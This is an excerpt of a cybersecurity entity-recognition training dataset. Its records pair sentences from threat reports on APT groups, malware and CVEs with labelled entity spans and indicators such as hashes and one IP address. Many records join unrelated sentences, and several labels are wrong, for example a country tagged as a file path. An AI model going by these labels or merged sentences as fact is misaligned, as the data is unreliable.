This allows application control solutions to block unknown threats .", "spans": {"MALWARE: ZxShell": [[325, 332]]}, "info": {"id": "cyberner_stix_train_006130", "source": "cyberner_stix_train"}} {"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group . The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file’s . /Library / LaunchDaemons / com.studentd.agent.plist", "spans": {"THREAT_ACTOR: cybercriminals": [[320, 334]], "THREAT_ACTOR: Lazarus hacking group": [[470, 491]]}, "info": {"id": "cyberner_stix_train_006131", "source": "cyberner_stix_train"}} {"text": "The first versions of these new USB stealer modules appeared around February 2015 and the latest appear to have been compiled in May 2015 .", "spans": {"TOOL: USB stealer": [[32, 43]]}, "info": {"id": "cyberner_stix_train_006132", "source": "cyberner_stix_train"}} {"text": "Location services to enable ( GPS/network ) tracking : The email command and control protocol . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system . APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos . 
LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"TOOL: Bankshot": [[146, 154]], "THREAT_ACTOR: attacker": [[192, 200]], "THREAT_ACTOR: APT33": [[241, 246]], "MALWARE: ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos": [[249, 327]], "TOOL: LIGHTWORK": [[330, 339]]}, "info": {"id": "cyberner_stix_train_006133", "source": "cyberner_stix_train"}} {"text": "This malware is simplistic in comparison to some modern-day Android malware . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers . While the attackers primarily targeted East Asian governments in the past , they have also started targeting a telecommunications company and electronics manufacturers . We took google - analytics as an example , but other services can also be used .", "spans": {"SYSTEM: Android": [[60, 67]], "TOOL: network-driven backdoors": [[101, 125]], "TOOL: modular backdoors": [[151, 168]], "TOOL: harvesting tools": [[171, 187]], "TOOL: wipers": [[194, 200]], "SYSTEM: google - analytics": [[381, 399]]}, "info": {"id": "cyberner_stix_train_006134", "source": "cyberner_stix_train"}} {"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"ORGANIZATION: users": [[230, 235]]}, "info": {"id": "cyberner_stix_train_006135", "source": "cyberner_stix_train"}} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . 
Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "ORGANIZATION: Kaspersky Lab": [[501, 514]]}, "info": {"id": "cyberner_stix_train_006136", "source": "cyberner_stix_train"}} {"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 . APT33 : 192.119.15.41 mynetwork.cf . Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.[7 ] Magic Hound malware has used IRC for C2.[8][9 ] Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519 .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "MALWARE: Pegasus": [[42, 49]], "SYSTEM: iOS": [[87, 90]], "ORGANIZATION: Citizen Lab": [[107, 118]], "ORGANIZATION: Lookout": [[123, 130]], "TOOL: Fuzzbunch": [[151, 160]], "THREAT_ACTOR: Shadow Brokers": [[234, 248]], "THREAT_ACTOR: APT33": [[265, 270]], "IP_ADDRESS: 192.119.15.41": [[273, 286]], "DOMAIN: mynetwork.cf": [[287, 299]], "TOOL: Stratum protocol": [[322, 338]], "SYSTEM: cryptojacking bot": [[383, 400]], "SYSTEM: mining server.[7": [[409, 425]], "MALWARE: Magic Hound malware": [[428, 447]], "SYSTEM: IRC": [[457, 460]], "SYSTEM: C2.[8][9": [[465, 473]], "THREAT_ACTOR: Adversaries": [[476, 487]], "TOOL: NETEAGLE": [[501, 509]]}, "info": {"id": "cyberner_stix_train_006137", "source": "cyberner_stix_train"}} {"text": "The newsletter 
includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": {"THREAT_ACTOR: attacker": [[38, 46]], "ORGANIZATION: Arbor Networks": [[171, 185]]}, "info": {"id": "cyberner_stix_train_006138", "source": "cyberner_stix_train"}} {"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ACTs .", "spans": {"MALWARE: Hancitor": [[149, 157]], "ORGANIZATION: Windows Defender ATP": [[160, 180]], "MALWARE: LEAD": [[265, 269]], "MALWARE: BARIUM": [[274, 280]]}, "info": {"id": "cyberner_stix_train_006139", "source": "cyberner_stix_train"}} {"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[99, 104]], "THREAT_ACTOR: Snake": [[109, 114]], "THREAT_ACTOR: Uroburos)": [[120, 129]], "FILEPATH: Trump's_Attack_on_Syria_English.docx": [[278, 314]]}, "info": {"id": "cyberner_stix_train_006140", "source": "cyberner_stix_train"}} {"text": "These intents are typically defined statically in the app ’ s AndroidManifest.xml config file ; some HenBox variants register further intents from their code at run-time . 
In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": {"MALWARE: HenBox": [[101, 107]], "THREAT_ACTOR: group": [[194, 199]], "TOOL: XMRig": [[224, 229]], "ORGANIZATION: FireEye": [[343, 350]], "THREAT_ACTOR: APT28": [[360, 365], [440, 445]], "ORGANIZATION: Russian government": [[479, 497]]}, "info": {"id": "cyberner_stix_train_006141", "source": "cyberner_stix_train"}} {"text": "We believe these edits were an attempt at evading detection by modifying or removing parts of the toolset that the authors believed might be helpful in identifying and detecting it .", "spans": {}, "info": {"id": "cyberner_stix_train_006142", "source": "cyberner_stix_train"}} {"text": "We suspect that this specific lure was copied from the news article http://www.cis.minsk.by/news.php?id=7557 .", "spans": {"URL: http://www.cis.minsk.by/news.php?id=7557": [[68, 108]]}, "info": {"id": "cyberner_stix_train_006143", "source": "cyberner_stix_train"}} {"text": "We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . 
Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"MALWARE: regsvr32.exe": [[70, 82]], "MALWARE: SCT file": [[145, 153]], "ORGANIZATION: intelligence services": [[223, 244]], "ORGANIZATION: military": [[247, 255]], "ORGANIZATION: utility providers": [[258, 275]], "ORGANIZATION: telecommunications": [[278, 296]], "ORGANIZATION: power": [[301, 306]], "ORGANIZATION: embassies": [[311, 320]], "ORGANIZATION: government institutions": [[327, 350]]}, "info": {"id": "cyberner_stix_train_006144", "source": "cyberner_stix_train"}} {"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , “ Agent Smith ” has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with ‘ AdMob ’ , ‘ Facebook ’ , ‘ MoPub ’ and ‘ Unity Ads ’ . The first malware we saw was the lurk downloader , which was distributed on October 26th . Dexphot ’s package often contains an obfuscated batch script . 
The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": {"MALWARE: Agent Smith": [[116, 127]], "SYSTEM: AdMob": [[324, 329]], "SYSTEM: Facebook": [[336, 344]], "SYSTEM: MoPub": [[351, 356]], "SYSTEM: Unity Ads": [[365, 374]], "TOOL: lurk downloader": [[412, 427]], "MALWARE: Dexphot": [[470, 477]]}, "info": {"id": "cyberner_stix_train_006145", "source": "cyberner_stix_train"}} {"text": "The DllMain function initializes the library and resolves all required Windows API functions .", "spans": {"SYSTEM: Windows": [[71, 78]]}, "info": {"id": "cyberner_stix_train_006146", "source": "cyberner_stix_train"}} {"text": "The second legible file , dated April 23 , has the same letterhead and also is addressed to Yahya al-Sinwar .", "spans": {}, "info": {"id": "cyberner_stix_train_006147", "source": "cyberner_stix_train"}} {"text": "However , this wo n't close the application , it will send it to the background , instead . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" . File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . 
”", "spans": {"THREAT_ACTOR: FIN7": [[154, 158]], "TOOL: MuddyWater C2": [[215, 228]], "TOOL: non-public tool": [[236, 251]], "TOOL: DNSMessenger": [[254, 266]], "FILEPATH: office.vbs": [[276, 286]], "FILEPATH: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2": [[298, 362]], "VULNERABILITY: CVE-2022 - 41080": [[448, 464]], "VULNERABILITY: CVE-2022 - 41040": [[539, 555]]}, "info": {"id": "cyberner_stix_train_006148", "source": "cyberner_stix_train"}} {"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13], [159, 172]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "VULNERABILITY: exploit": [[200, 207]], "FILEPATH: tools—EternalRomance": [[208, 228]], "FILEPATH: EternalSynergy—that": [[233, 252]]}, "info": {"id": "cyberner_stix_train_006149", "source": "cyberner_stix_train"}} {"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn’t appear that the malware authors have modified much of the original code . 
So far in 2023 , ransomware gangs hit the US , Germany , France , and the UK hard , with the US shouldering a hefty 43 % of all global attacks .", "spans": {"THREAT_ACTOR: threat group": [[187, 199]], "ORGANIZATION: FireEye": [[205, 212]], "THREAT_ACTOR: APT33": [[223, 228]], "ORGANIZATION: defense": [[301, 308]], "ORGANIZATION: aerospace": [[311, 320]], "ORGANIZATION: petrochemical organizations": [[325, 352]], "TOOL: Crypto++": [[445, 453]], "THREAT_ACTOR: ransomware gangs": [[576, 592]], "ORGANIZATION: US": [[601, 603], [652, 654]], "ORGANIZATION: Germany": [[606, 613]], "ORGANIZATION: France": [[616, 622]], "ORGANIZATION: the": [[629, 632]]}, "info": {"id": "cyberner_stix_train_006150", "source": "cyberner_stix_train"}} {"text": "On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian embassy in Thailand .", "spans": {"TOOL: email": [[51, 56], [77, 82]], "ORGANIZATION: Indian embassy": [[101, 115]]}, "info": {"id": "cyberner_stix_train_006151", "source": "cyberner_stix_train"}} {"text": "EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions . 
Compromised file samples ( Win32/HackedApp.Winnti.A and B ) mac-555549440ea0d64e96bb34428e08cc8d948b40e7", "spans": {"TOOL: Emissary": [[518, 526]], "FILEPATH: Win32/HackedApp.Winnti.A and B": [[679, 709]], "MALWARE: mac-555549440ea0d64e96bb34428e08cc8d948b40e7": [[712, 756]]}, "info": {"id": "cyberner_stix_train_006152", "source": "cyberner_stix_train"}} {"text": "] orgacount-manager [ . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware . APT1 has registered at least 107 zones since 2004 . Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: Iranians": [[82, 90]], "THREAT_ACTOR: APT1": [[174, 178]]}, "info": {"id": "cyberner_stix_train_006153", "source": "cyberner_stix_train"}} {"text": "Enforce a strict lockout policy for network users and closely monitor logs for failed login activity .", "spans": {}, "info": {"id": "cyberner_stix_train_006154", "source": "cyberner_stix_train"}} {"text": "Given the release of sensitive victim data , extortion , and destruction of systems , FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far . 
Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"ORGANIZATION: FireEye": [[86, 93]], "THREAT_ACTOR: FIN10": [[104, 109]], "THREAT_ACTOR: GoCrack": [[236, 243]], "ORGANIZATION: additional users": [[377, 393]]}, "info": {"id": "cyberner_stix_train_006155", "source": "cyberner_stix_train"}} {"text": "The threat actors have a demonstrated ability to move from one network provider to another , using some infrastructure for extended periods of time and other domains for only a few days .", "spans": {}, "info": {"id": "cyberner_stix_train_006156", "source": "cyberner_stix_train"}} {"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP PROT 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": {"THREAT_ACTOR: APT33": [[177, 182]], "MALWARE: malicious file": [[249, 263]], "MALWARE: custom binary protocol": [[337, 359]], "MALWARE: beacon": [[363, 369]], "TOOL: C2": [[404, 406]], "ORGANIZATION: communications": [[536, 550]]}, "info": {"id": "cyberner_stix_train_006157", "source": "cyberner_stix_train"}} {"text": "The following screenshot shows the command execution functionality in action : The paramString parameter shown in the above screenshot can be any command received from C & C . Silence sent out emails to Russian banks . 
To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software .", "spans": {"THREAT_ACTOR: Silence": [[176, 183]], "ORGANIZATION: banks": [[211, 216]], "THREAT_ACTOR: Cobalt group": [[308, 320]], "MALWARE: Beacon": [[351, 357]], "MALWARE: Trojan": [[362, 368]]}, "info": {"id": "cyberner_stix_train_006158", "source": "cyberner_stix_train"}} {"text": "So far , legitimate app stores appear to be this malware ’ s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations . the plugin manipulates the IDA intermediate language called microcode . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": {"TOOL: PIEHOP": [[485, 491]], "TOOL: LIGHTWORK": [[501, 510]]}, "info": {"id": "cyberner_stix_train_006159", "source": "cyberner_stix_train"}} {"text": "TG-3390 attempts to reenter the environment by identifying accounts that do not require two-factor authentication for remote access solutions , and then brute forcing usernames and passwords .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "cyberner_stix_train_006160", "source": "cyberner_stix_train"}} {"text": "Upon completion , the payload continues execution in usermode with the privileges of the System process .", "spans": {}, "info": {"id": "cyberner_stix_train_006161", "source": "cyberner_stix_train"}} {"text": "Let ’ s take a closer look at the suspicious file . 
These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": {"THREAT_ACTOR: FIN7": [[255, 259]], "TOOL: PoS": [[346, 349]]}, "info": {"id": "cyberner_stix_train_006162", "source": "cyberner_stix_train"}} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots . OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": {"MALWARE: PowerShell": [[4, 14]], "MALWARE: OSX_DOK.C": [[79, 88]], "EMAIL: phishing email": [[109, 123]]}, "info": {"id": "cyberner_stix_train_006163", "source": "cyberner_stix_train"}} {"text": "Project Spy routine At the end of March 2020 , we came across an app masquerading as a coronavirus update app , which we named Project Spy based on the login page of its backend server . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system . block comparison variable is searched in each block of endsWithJcc and nonJcc . 
Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"MALWARE: Project Spy": [[0, 11], [127, 138]], "TOOL: VNC": [[235, 238]], "TOOL: endsWithJcc": [[406, 417]], "TOOL: nonJcc": [[422, 428]], "THREAT_ACTOR: Monti": [[465, 470]], "SYSTEM: Linux platform": [[486, 500]]}, "info": {"id": "cyberner_stix_train_006164", "source": "cyberner_stix_train"}} {"text": "Users do not see those SMS because they are processed not by the SMS app , but by the app that has initiated the transaction — e.g a free-to-play game . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . The group behind the OilRig campaign continues to leverage spear-phishing emails with malicious Microsoft Excel documents to compromise victims .", "spans": {"VULNERABILITY: zero day": [[235, 243]], "VULNERABILITY: CVE-2016-4171": [[244, 257]], "TOOL: emails": [[334, 340]]}, "info": {"id": "cyberner_stix_train_006165", "source": "cyberner_stix_train"}} {"text": "On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . 
We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[24, 37]], "ORGANIZATION: individual": [[72, 82]], "TOOL: Ultimate Packer": [[193, 208]], "TOOL: Executables": [[213, 224]], "MALWARE: malware": [[296, 303]]}, "info": {"id": "cyberner_stix_train_006166", "source": "cyberner_stix_train"}} {"text": "The IOCs provided with this alert include IP S-PROT addresses determined to be part of the HIDDEN COBRA botnet infrastructure , identified as DeltaCharlie .", "spans": {"TOOL: IOCs": [[4, 8]], "TOOL: IP S-PROT addresses": [[42, 61]], "THREAT_ACTOR: HIDDEN COBRA": [[91, 103]], "TOOL: botnet": [[104, 110]], "MALWARE: DeltaCharlie": [[142, 154]]}, "info": {"id": "cyberner_stix_train_006167", "source": "cyberner_stix_train"}} {"text": "The May 2018 adversary spotlight is on MYTHIC LEOPARD , a Pakistan-based adversary with operations likely located in Karachi . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"THREAT_ACTOR: MYTHIC LEOPARD": [[39, 53]], "MALWARE: Word": [[159, 163]], "THREAT_ACTOR: PLATINUM": [[166, 174]], "ORGANIZATION: Microsoft": [[227, 236]], "VULNERABILITY: CVE-2015-2545": [[280, 293]], "THREAT_ACTOR: attacker": [[327, 335]]}, "info": {"id": "cyberner_stix_train_006168", "source": "cyberner_stix_train"}} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . 
One hour later , Bemstour was used against an educational institution in Belgium .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "FILEPATH: Bemstour": [[190, 198]], "FILEPATH: Belgium": [[246, 253]]}, "info": {"id": "cyberner_stix_train_006169", "source": "cyberner_stix_train"}} {"text": "In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . However , once the victim enters an account and password .", "spans": {"ORGANIZATION: U.S.-based defense": [[48, 66]], "ORGANIZATION: aerospace technologies": [[152, 174]], "ORGANIZATION: combat processes": [[177, 193]], "ORGANIZATION: naval defense systems": [[200, 221]]}, "info": {"id": "cyberner_stix_train_006170", "source": "cyberner_stix_train"}} {"text": "While previous routines took advantage of competing miners ’ activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files .", "spans": {}, "info": {"id": "cyberner_stix_train_006171", "source": "cyberner_stix_train"}} {"text": "The link resolves to a URL designed to appear legitimate , with a canonical domain of sicher97140 [ . In the Sea Turtle campaign , Talos was able to identify two distinct groups of victims . 
Orangeworm is a group that has targeted organizations in the healthcare sector in the United States , Europe , and Asia since at least 2015 , likely for the purpose of corporate espionage .", "spans": {"ORGANIZATION: Talos": [[131, 136]], "THREAT_ACTOR: Orangeworm": [[191, 201]]}, "info": {"id": "cyberner_stix_train_006172", "source": "cyberner_stix_train"}} {"text": "When the current app on the foreground matches with an app targeted by the malware , the Trojan will show the corresponding phishing overlay , making the user think it is the app that was just started . In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 . The Middle Eastern hacker group in this case is codenamed “ BlackOasis . ” Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of “ FinSpy ” malware , according to a new blog post published Monday . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": {"ORGANIZATION: Kaspersky Lab": [[234, 247]], "THREAT_ACTOR: BlackOasis": [[386, 396]], "ORGANIZATION: Kaspersky": [[401, 410]], "TOOL: Adobe Flash Player": [[444, 462]], "VULNERABILITY: zero-day": [[463, 471]], "VULNERABILITY: CVE-2016-4117": [[488, 501]], "MALWARE: FinSpy": [[548, 554]], "THREAT_ACTOR: Adversaries": [[615, 626]]}, "info": {"id": "cyberner_stix_train_006173", "source": "cyberner_stix_train"}} {"text": "This can also define what kind of evidences to collect . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . 
The next portion of first block and each flattened block is decided by a “ block comparison variable ” Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": {"VULNERABILITY: Carbanak": [[57, 65]], "MALWARE: Ransomware builders": [[305, 324]]}, "info": {"id": "cyberner_stix_train_006174", "source": "cyberner_stix_train"}} {"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": {"MALWARE: sample": [[5, 11]], "MALWARE: Trochilus": [[31, 40]], "VULNERABILITY: exploit": [[278, 285], [468, 475]], "MALWARE: InPage software": [[290, 305]], "ORGANIZATION: Unit42": [[360, 366]], "TOOL: InPage": [[389, 395]], "VULNERABILITY: exploits": [[396, 404]], "ORGANIZATION: Kaspersky": [[500, 509]]}, "info": {"id": "cyberner_stix_train_006175", "source": "cyberner_stix_train"}} {"text": "The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . 
Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload .", "spans": {"MALWARE: DanBot": [[78, 84]], "ORGANIZATION: CTU": [[105, 108]], "TOOL: Microsoft Word": [[183, 197]], "TOOL: PowerShell": [[268, 278]], "TOOL: PS": [[281, 283]]}, "info": {"id": "cyberner_stix_train_006176", "source": "cyberner_stix_train"}} {"text": "As shown , the certificate uses mail.mfa.gov.ua as a Common Name .", "spans": {"DOMAIN: mail.mfa.gov.ua": [[32, 47]]}, "info": {"id": "cyberner_stix_train_006177", "source": "cyberner_stix_train"}} {"text": "Alternating Dridex and Locky campaigns of varying volumes appeared through May 2016 .", "spans": {"MALWARE: Dridex": [[12, 18]], "MALWARE: Locky": [[23, 28]]}, "info": {"id": "cyberner_stix_train_006178", "source": "cyberner_stix_train"}} {"text": "The Windows and MacOS versions of X-Agent are capable of recording keystrokes , taking screenshots , and exfiltrating files from infected systems back to a command and control server .", "spans": {"SYSTEM: Windows": [[4, 11]], "SYSTEM: MacOS": [[16, 21]], "MALWARE: X-Agent": [[34, 41]]}, "info": {"id": "cyberner_stix_train_006179", "source": "cyberner_stix_train"}} {"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HttpBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: vulnerability": [[67, 80], [175, 188]], "TOOL: Java": [[88, 92]], "TOOL: Runtime Environment": [[93, 112]], "MALWARE: HttpBrowser": [[130, 141]], "TOOL: backdoor": [[142, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]]}, "info": {"id": "cyberner_stix_train_006180", "source": 
"cyberner_stix_train"}} {"text": "It ’ s a complicated puzzle that can be solved by skilled reverse engineers only with good amount of time , code , automation , and creativity . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . They allow the attacker to run additional executables from a given URL . We found roughly 500 domain names that lead or have led to the “ Pig network ” between 2015 to March 2017 .", "spans": {"THREAT_ACTOR: group": [[149, 154]], "VULNERABILITY: PDF exploits": [[186, 198]], "VULNERABILITY: Adobe Flash Player exploits": [[201, 228]], "VULNERABILITY: CVE-2012-0158": [[246, 259]], "VULNERABILITY: Word exploits": [[260, 273]], "TOOL: Tran Duy Linh": [[320, 333]]}, "info": {"id": "cyberner_stix_train_006181", "source": "cyberner_stix_train"}} {"text": "The callback gets the EPROCESS structures of the current process and the System process , and copies data from the System token into the token of the current process .", "spans": {"TOOL: EPROCESS": [[22, 30]]}, "info": {"id": "cyberner_stix_train_006182", "source": "cyberner_stix_train"}} {"text": "We believe that the exploit for CVE- 2010-4398 was also based on a publicly available proof of concept .", "spans": {"VULNERABILITY: CVE- 2010-4398": [[32, 46]]}, "info": {"id": "cyberner_stix_train_006183", "source": "cyberner_stix_train"}} {"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . 
The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": {"TOOL: sub-domains": [[137, 148]]}, "info": {"id": "cyberner_stix_train_006184", "source": "cyberner_stix_train"}} {"text": "In all of the cases involving an advanced threat , the certificates were used to disguise malware as a legitimate file or application .", "spans": {}, "info": {"id": "cyberner_stix_train_006185", "source": "cyberner_stix_train"}} {"text": "The Downeks downloader and Quasar C2 infrastructures are each self-contained and independent of each other .", "spans": {"MALWARE: Downeks": [[4, 11]], "MALWARE: Quasar": [[27, 33]], "TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_006186", "source": "cyberner_stix_train"}} {"text": "This contains the Mobile Country Code ( MCC ) and Mobile Network Code ( MNC ) values that the billing process will work for . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The installation procedure continues in the user-mode dropper . 
